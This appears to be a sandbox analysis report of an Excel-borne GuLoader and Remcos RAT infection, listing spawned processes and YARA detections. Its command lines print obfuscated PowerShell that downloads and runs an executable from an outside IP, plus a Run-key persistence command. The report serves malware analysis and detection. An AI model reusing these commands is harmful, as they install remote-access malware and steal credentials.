                                                                            MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:5
                                                                            Start time:03:53:28
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\System32\cmd.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'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'+[cHAR]0x22+'))')))"
                                                                            Imagebase:0x4aba0000
                                                                            File size:345'088 bytes
                                                                            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:7
                                                                            Start time:03:53:28
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'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'+[cHAR]0x22+'))')))"
                                                                            Imagebase:0x13fbf0000
                                                                            File size:443'392 bytes
                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:8
                                                                            Start time:03:53:31
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.cmdline"
                                                                            Imagebase:0x13f7e0000
                                                                            File size:2'758'280 bytes
                                                                            MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:9
                                                                            Start time:03:53:31
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA499.tmp" "c:\Users\user\AppData\Local\Temp\sm41lsyu\CSCE0CED41DA99B458392766F6BC82F0D5.TMP"
                                                                            Imagebase:0x13fee0000
                                                                            File size:52'744 bytes
                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:11
                                                                            Start time:03:53:38
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Roaming\dllhost.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Roaming\dllhost.exe"
                                                                            Imagebase:0x400000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:12
                                                                            Start time:03:53:38
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
                                                                            Imagebase:0xfe0000
                                                                            File size:427'008 bytes
                                                                            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000C.00000002.808389221.0000000009888000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:15
                                                                            Start time:03:53:44
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\System32\mshta.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                            Imagebase:0x13f100000
                                                                            File size:13'824 bytes
                                                                            MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:17
                                                                            Start time:03:53:49
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\System32\cmd.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
                                                                            Imagebase:0x4a110000
                                                                            File size:345'088 bytes
                                                                            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:19
                                                                            Start time:03:53:49
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'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'+[cHAR]0x22+'))')))"
                                                                            Imagebase:0x13f530000
                                                                            File size:443'392 bytes
                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:20
                                                                            Start time:03:53:52
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.cmdline"
                                                                            Imagebase:0x13fa70000
                                                                            File size:2'758'280 bytes
                                                                            MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:21
                                                                            Start time:03:53:53
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF72C.tmp" "c:\Users\user\AppData\Local\Temp\r4gn3nq1\CSCA7279739985342FFA8B6946FD4222CB8.TMP"
                                                                            Imagebase:0x13f640000
                                                                            File size:52'744 bytes
                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:23
                                                                            Start time:03:53:57
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Roaming\dllhost.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Roaming\dllhost.exe"
                                                                            Imagebase:0x400000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:24
                                                                            Start time:03:53:58
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
                                                                            Imagebase:0xfe0000
                                                                            File size:427'008 bytes
                                                                            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000018.00000002.1008062874.0000000009B56000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            Has exited:true

                                                                            Target ID:28
                                                                            Start time:03:55:49
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\Vaccinerende.exe"
                                                                            Imagebase:0x400000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:false

                                                                            Target ID:29
                                                                            Start time:03:56:12
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"
                                                                            Imagebase:0x4a770000
                                                                            File size:302'592 bytes
                                                                            MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:31
                                                                            Start time:03:56:13
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\SysWOW64\reg.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"
                                                                            Imagebase:0xc50000
                                                                            File size:62'464 bytes
                                                                            MD5 hash:D69A9ABBB0D795F21995C2F48C1EB560
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:33
                                                                            Start time:03:56:18
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\Vaccinerende.exe"
                                                                            Imagebase:0x400000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000021.00000002.1004764696.0000000006AA4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            Has exited:true

                                                                            Target ID:34
                                                                            Start time:03:56:20
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\uufpqcznfpbrpkbrchvwvbbgmplrtlta"
                                                                            Imagebase:0x400000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:35
                                                                            Start time:03:56:20
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\wwta"
                                                                            Imagebase:0x400000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:36
                                                                            Start time:03:56:21
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\hrysrnv"
                                                                            Imagebase:0x400000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:37
                                                                            Start time:03:56:26
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Frligheden)
                                                                            Imagebase:0xfe0000
                                                                            File size:427'008 bytes
                                                                            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:39
                                                                            Start time:03:56:30
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\jypyihgkg"
                                                                            Imagebase:0x400000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:40
                                                                            Start time:03:56:32
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\tsdrjareurci"
                                                                            Imagebase:0x400000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:41
                                                                            Start time:03:56:32
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
                                                                            Imagebase:0xfe0000
                                                                            File size:427'008 bytes
                                                                            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:false

                                                                            Target ID:42
                                                                            Start time:03:56:32
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\wvibksbfizuvagm"
                                                                            Imagebase:0x400000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:43
                                                                            Start time:03:56:36
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Frligheden)
                                                                            Imagebase:0xfe0000
                                                                            File size:427'008 bytes
                                                                            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:46
                                                                            Start time:03:56:40
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\iwmakfxbvkkvnuhajheo"
                                                                            Imagebase:0x400000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:47
                                                                            Start time:03:56:40
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\krsslxicrscipavesrrqbfdw"
                                                                            Imagebase:0x400000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:48
                                                                            Start time:03:56:40
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
                                                                            Imagebase:0xfe0000
                                                                            File size:427'008 bytes
                                                                            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:false

                                                                            Target ID:49
                                                                            Start time:03:56:40
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\vtxdlqtwfaunaojibclrekqfvdn"
                                                                            Imagebase:0x400000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:50
                                                                            Start time:03:56:47
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\myrqksteqvbcbpuimnlztpdvy"
                                                                            Imagebase:0x400000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:false

                                                                            Target ID:51
                                                                            Start time:03:56:52
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\xtwidkeyedthlwimexyaecymzxube"
                                                                            Imagebase:0x400000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:52
                                                                            Start time:03:56:53
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\zvbbddpzsllmnceqnitchhsvidlcgnnv"
                                                                            Imagebase:0x400000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:54
                                                                            Start time:03:57:04
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\jghbahqihjysxfkijlbzkstdovyth"
                                                                            Imagebase:0x400000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:false

                                                                            Target ID:55
                                                                            Start time:03:57:07
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\tamubzacvrqfilguawnanwnuwchuixxt"
                                                                            Imagebase:0x400000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:56
                                                                            Start time:03:57:08
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\dcam"
                                                                            Imagebase:0x13fa80000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:57
                                                                            Start time:03:57:14
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            Wow64 process (32bit):
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\ctsuyeuksgddrommozvfphobcmulr"
                                                                            Imagebase:
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:false

Call Graph

Call graph: empty (no graph was produced for this process).

Module: Sheet1

Declaration

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Module: Sheet2

Declaration

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Module: Sheet3

Declaration

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Module: ThisWorkbook

Declaration

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000003.413689592.00000000030B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_3_30b0000_mshta.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
